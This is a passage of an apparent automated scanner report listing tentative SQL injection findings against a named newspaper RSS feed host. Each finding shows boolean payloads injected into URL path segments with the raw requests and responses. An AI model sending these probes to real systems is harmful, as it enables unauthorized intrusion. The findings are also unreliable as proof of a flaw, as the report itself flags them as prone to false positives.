Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14517237'%20or%201%3d1--%20 and 14517237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss14517237'%20or%201%3d1--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

Request 2

GET /mngi/rss14517237'%20or%201%3d2--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.91. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200923.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200923.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:36 GMT
Content-Length: 0
Connection: close


1.92. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200924.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200924.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48401163'%20or%201%3d1--%20 and 48401163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d1--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d2--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.93. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200925.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200925.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close


1.94. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200927.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200927.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:26 GMT
Content-Length: 0
Connection: close


1.95. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200929.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200929.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:32 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.96. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200930.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200930.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:03 GMT
Date: Tue, 07 Dec 2010 23:22:03 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.97. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200934.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200934.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:15 GMT
Date: Tue, 07 Dec 2010 23:22:15 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.98. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12838428'%20or%201%3d1--%20 and 12838428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi12838428'%20or%201%3d1--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi12838428'%20or%201%3d2--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:57 GMT
Date: Tue, 07 Dec 2010 23:21:57 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.99. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
